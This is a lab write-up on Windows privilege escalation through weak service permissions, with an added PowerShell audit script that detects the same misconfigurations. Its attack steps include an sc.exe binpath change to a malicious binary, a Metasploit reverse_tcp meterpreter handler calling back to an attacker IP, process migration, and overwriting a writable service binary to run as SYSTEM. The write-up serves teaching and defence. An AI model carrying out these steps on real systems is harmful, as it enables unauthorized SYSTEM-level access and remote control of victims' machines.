# Weak Service Permissions

This quick lab covers two Windows service misconfigurations that let a low-privileged user elevate to the account the service runs as:

1. A low-privileged user is allowed to change the service configuration, for example the binary path the service launches when it starts
2. A low-privileged user can overwrite the binary the service launches when it starts

## 1. Changing Service Configuration

Let's enumerate services with `accesschk` from Sysinternals and look for `SERVICE_ALL_ACCESS` or `SERVICE_CHANGE_CONFIG`, as these rights allow an attacker to modify the service configuration:

{% code title="attacker\@victim" %}

```
\\vboxsvr\tools\accesschk.exe /accepteula -ucv "mantvydas" evilsvc
or
\\vboxsvr\tools\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
```

{% endcode %}

The output below shows that the user `mantvydas` has full access to the service:

![](/files/-LfQxQsNMbh9wtREtazf)

Let's modify the service and point its binary to our malicious binary that will get us a meterpreter shell when the service is launched:

{% code title="attacker\@victim" %}

```
.\sc.exe config evilsvc binpath= "c:\program.exe"
```

{% endcode %}

![](/files/-LfQxuVr05oPcMg42QwD)

Let's fire up a multi/handler in msfconsole:

{% code title="attacker\@kali" %}

```
msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"
```

{% endcode %}

...and start the vulnerable service:

{% code title="attacker\@victim" %}

```
.\sc.exe start evilsvc
```

{% endcode %}

...and enjoy the meterpreter session:

![](/files/-LfQz8uKhh0sgwvqHXHd)

Note that the meterpreter session will die soon, since the meterpreter binary `program.exe` that the vulnerable service `evilsvc` kicked off is not a real service binary: it never reports back to the Service Control Manager, so the SCM terminates it once the start timeout expires. To save the session, migrate it to another process:

{% code title="attacker\@kali" %}

```
run post/windows/manage/migrate
```

{% endcode %}

Even though the service failed, the session was migrated and saved:

![](/files/-LfR--yC-M0aaMjzfPO0)

## 2. Overwriting Service Binary

From the first exercise, we know that our user has `SERVICE_ALL_ACCESS` for the service `evilsvc`. Let's check the service binary path:

{% code title="attacker\@victim" %}

```
sc.exe qc evilsvc
```

{% endcode %}

![](/files/-LfR0BB2kCT-lS1fF_7h)

Let's check the file permissions of the binary `c:\service.exe` using the native Windows tool `icacls` and look for (M)odify or (F)ull permissions granted to `Authenticated Users` or to the user you currently have a shell as:

{% code title="attacker\@victim" %}

```
icacls C:\service.exe
```

{% endcode %}

![](/files/-LfR0MqaYrrcerQUvsHV)

Since `c:\service.exe` is (M)odifiable by any authenticated user, we can copy our malicious binary `c:\program.exe` over `c:\service.exe`:

{% code title="attacker\@victim" %}

```
cp C:\program.exe C:\service.exe
ls c:\
```

{% endcode %}

![](/files/-LfR0_cS8E9RVeGIrZQq)

...and get the meterpreter shell once `sc start evilsvc` is executed. Note that the shell will die if we do not migrate to another process in the same way as mentioned earlier:

![](/files/-LfR0rMgwsfchYJdGaCV)

Since services commonly run under `NT AUTHORITY\SYSTEM`, our malicious binary gets executed with `SYSTEM` privileges:

![](/files/-LfR3MA-AJ7pVG_uHmo5)
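As an added defender-side audit (not part of the original lab), the PowerShell script below combines both checks from sections 1 and 2 across every installed service: it parses each service's DACL from `sc.exe sdshow` for config-changing rights granted to Everyone, Authenticated Users, Users or the current user, and checks the service binary's file ACL for write or delete rights held by the same principals. Function names such as `Test-ServiceConfigWritable` are my own; it assumes PowerShell 5.1 or later on Windows.

```powershell
# Audit script (added example, not from the original page). Lists services whose
# configuration or binary is writable by broad principals or the current user.
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')   # Everyone, Authenticated Users, Users
$BroadSids += [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
# SERVICE_CHANGE_CONFIG | WRITE_DAC | WRITE_OWNER | GENERIC_ALL | GENERIC_WRITE
$ServiceWriteMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
# FILE: WriteData | AppendData | Delete | ChangePermissions | TakeOwnership
$FileWriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000

function Get-ServiceBinaryPath([string]$PathName) {
    # Handles quoted ("C:\x y\svc.exe" -arg) and unquoted (C:\x y\svc.exe -arg) paths.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-ServiceConfigWritable([string]$Name) {
    # sc.exe sdshow prints the service security descriptor as an SDDL string
    $sddl = (& sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return $false }   # no READ_CONTROL, or service not found
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if (($ace.AccessMask -band $ServiceWriteMask) -and
            ($BroadSids -contains $ace.SecurityIdentifier.Value)) { return $true }
    }
    return $false
}

function Test-BinaryWritable([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    # Ask for rules keyed by SID so no name translation is needed
    foreach ($rule in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if (([int]$rule.FileSystemRights -band $FileWriteMask) -and
            ($BroadSids -contains $rule.IdentityReference.Value)) { return $true }
    }
    return $false
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    [pscustomobject]@{
        Service        = $_.Name
        RunsAs         = $_.StartName
        Binary         = $bin
        ConfigWritable = Test-ServiceConfigWritable $_.Name
        BinaryWritable = Test-BinaryWritable $bin
    }
} | Where-Object { $_.ConfigWritable -or $_.BinaryWritable } | Format-Table -AutoSize
```

Any row reported here is a finding to fix by tightening the service DACL (`sc.exe sdset`) or the binary's NTFS ACL (`icacls`), which is the remediation for both misconfigurations shown in this lab.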
